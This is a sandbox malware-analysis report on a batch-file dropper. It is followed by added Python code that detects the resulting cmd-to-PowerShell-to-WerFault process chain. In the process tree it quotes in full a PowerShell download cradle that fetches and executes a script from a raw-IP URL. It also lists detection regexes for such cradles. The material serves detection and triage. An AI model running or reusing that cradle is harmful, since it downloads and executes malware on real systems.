Analysis
- max time kernel: 133s
- max time network: 68s
- platform: windows10_x64
- resource: win10v200430
- submitted: 21-05-2020 18:10
Static task
- static1

Behavioral task
- behavioral1
- Sample: 328013aa2b767f95491e4d8e9372cc46.bat
- Resource: win7v200430 (windows7_x64)
- 0 signatures, 0 seconds

Behavioral task
- behavioral2
- Sample: 328013aa2b767f95491e4d8e9372cc46.bat
- Resource: win10v200430 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: 328013aa2b767f95491e4d8e9372cc46.bat
- Size: 219B
- MD5: 8da3de41f693d26688864e6e24e5c4f0
- SHA1: 229f10d9481ea1c89a085e76365149ca34ca4614
- SHA256: de741f43e0b638ccbfadfc41f6e82f8fd2c5b39d4f9f38469affb4d4960487b5
- SHA512: 70d2cb7f7cb47c2b9111d548b4f405ea7b5e95ced055d64e25190200487e174f36f2fe86aaa86c4778c2f6f3c8d10e05ba6a55b808437b2d180a4cee67240386
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Source: URLs
- ps1.dropper: http://185.103.242.78/pastes/328013aa2b767f95491e4d8e9372cc46
Signatures

Program crash (1 IoC)
Processes:
  pid   pid_target  process       target process
  2132  1572        WerFault.exe  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
  description                 pid   process
  Token: SeRestorePrivilege   2132  WerFault.exe
  Token: SeBackupPrivilege    2132  WerFault.exe
  Token: SeDebugPrivilege     2132  WerFault.exe

Suspicious behavior: EnumeratesProcesses (14 IoCs)
Processes:
  pid   process
  2132  WerFault.exe  (14 occurrences)
Processes

[depth 1] PID 1300  C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\328013aa2b767f95491e4d8e9372cc46.bat"

  [depth 2] PID 1572  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/328013aa2b767f95491e4d8e9372cc46');Invoke-AATPTEWMZPXK;Start-Sleep -s 10000"

    [depth 3] PID 2132  C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1572 -s 704
        Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses
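The chain above is a one-line PowerShell download cradle: cmd.exe runs the .bat, which launches the 32-bit (SysWOW64) PowerShell host to fetch a script from a raw-IP URL, pass it to IEX, call a function from it and then sleep for 10000 seconds. Every signature in the report is raised by WerFault.exe, whose command line (-p 1572) shows it handling a crash of that PowerShell process; privilege adjustment and process enumeration are consistent with the crash handler's normal operation, so the actionable indicators are the command line itself and the extracted dropper URL. The following is an added example and is not part of the sandbox report: Python detection logic run over constructed process-creation records modelled on the tree above (PIDs, images and command lines are copied from the report; the parent PIDs, the benign CONTROL record, the rule names and the one-hour sleep threshold are assumptions of this example). It flags the cradle, extracts the URL indicator, notes the long sleep and the 64-bit-to-32-bit host switch, and links the WerFault invocation back to the process it reported on.

```python
"""Detection logic for the cmd.exe -> powershell.exe -> WerFault.exe chain.

Added example, not part of the sandbox report. The records below are
constructed: PIDs, images and command lines are copied from the report's
process tree; parent PIDs (ppid) follow the tree depth, and the CONTROL
record is invented to show the rules stay quiet on ordinary PowerShell use.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int      # 0 means the parent is not among the records
    image: str
    cmdline: str


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    detail: str


SAMPLE = [
    Proc(1300, 0, r"C:\Windows\system32\cmd.exe",
         r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\328013aa2b767f95491e4d8e9372cc46.bat"'),
    Proc(1572, 1300, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
         r'''C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/328013aa2b767f95491e4d8e9372cc46');Invoke-AATPTEWMZPXK;Start-Sleep -s 10000"'''),
    Proc(2132, 1572, r"C:\Windows\SysWOW64\WerFault.exe",
         r"C:\Windows\SysWOW64\WerFault.exe -u -p 1572 -s 704"),
]
# Constructed benign control: 64-bit PowerShell running a local cmdlet, no network.
CONTROL = Proc(4100, 1300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               r'powershell.exe -NoProfile -Command "Get-Process | Out-Null"')

IEX_RE = re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I)
DOWNLOAD_RE = re.compile(
    r"Net\.WebClient|DownloadString|DownloadData|DownloadFile|Invoke-WebRequest|\bIWR\b|Invoke-RestMethod|\bIRM\b",
    re.I)
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.I)
# Start-Sleep <n>, Start-Sleep -s <n>, Start-Sleep -Seconds <n>; -Milliseconds is deliberately not matched.
SLEEP_RE = re.compile(r"Start-Sleep\s+(?:-s(?:econds)?\s+)?(\d+)", re.I)
WERFAULT_TARGET_RE = re.compile(r"\s-p\s+(\d+)")   # WerFault.exe -p <pid of faulting process>
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
LONG_SLEEP_SECONDS = 3600  # heuristic threshold; an assumption of this example


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def extract_urls(cmdline: str) -> list[str]:
    return URL_RE.findall(cmdline)


def analyze(procs: list[Proc]) -> list[Finding]:
    by_pid = {p.pid: p for p in procs}
    out: list[Finding] = []
    for p in procs:
        name = basename(p.image)
        parent = by_pid.get(p.ppid)
        if name in ("powershell.exe", "pwsh.exe"):
            if IEX_RE.search(p.cmdline) and DOWNLOAD_RE.search(p.cmdline):
                out.append(Finding(p.pid, "powershell_download_cradle",
                                   "IEX combined with a download primitive in one command line"))
            for url in extract_urls(p.cmdline):
                host = urlparse(url).hostname or ""
                kind = "raw IPv4 host" if IPV4_RE.match(host) else "hostname"
                out.append(Finding(p.pid, "remote_url_ioc", f"{url} ({kind})"))
            m = SLEEP_RE.search(p.cmdline)
            if m and int(m.group(1)) >= LONG_SLEEP_SECONDS:
                out.append(Finding(p.pid, "long_sleep_after_cradle",
                                   f"Start-Sleep {m.group(1)} s keeps the host resident"))
            # 64-bit parent under System32 explicitly launching the 32-bit PowerShell host.
            if "\\syswow64\\" in p.image.lower() and parent and "\\system32\\" in parent.image.lower():
                out.append(Finding(p.pid, "wow64_powershell_from_64bit_parent",
                                   f"{basename(parent.image)} ({parent.pid}) launched the 32-bit PowerShell host"))
        elif name == "werfault.exe":
            m = WERFAULT_TARGET_RE.search(p.cmdline)
            if m:
                target = by_pid.get(int(m.group(1)))
                who = f"{basename(target.image)} ({target.pid})" if target else f"pid {m.group(1)} (not in records)"
                out.append(Finding(p.pid, "crash_reported_for_process", f"WerFault handled a crash of {who}"))
    return out


def rules_for(findings: list[Finding], pid: int) -> set[str]:
    return {f.rule for f in findings if f.pid == pid}


if __name__ == "__main__":
    for f in analyze(SAMPLE + [CONTROL]):
        print(f"pid {f.pid:<5} {f.rule:<36} {f.detail}")
```

Run against the report's tree, the script attributes four findings to PID 1572 and one to PID 2132, and nothing to cmd.exe or the control record. The WerFault link is the caveat worth carrying into triage: the "Program crash" signature belongs to the dropper stage itself, so the script fetched from 185.103.242.78 may never have executed in this run, and the extracted URL is the indicator to pivot on rather than the WerFault behaviour.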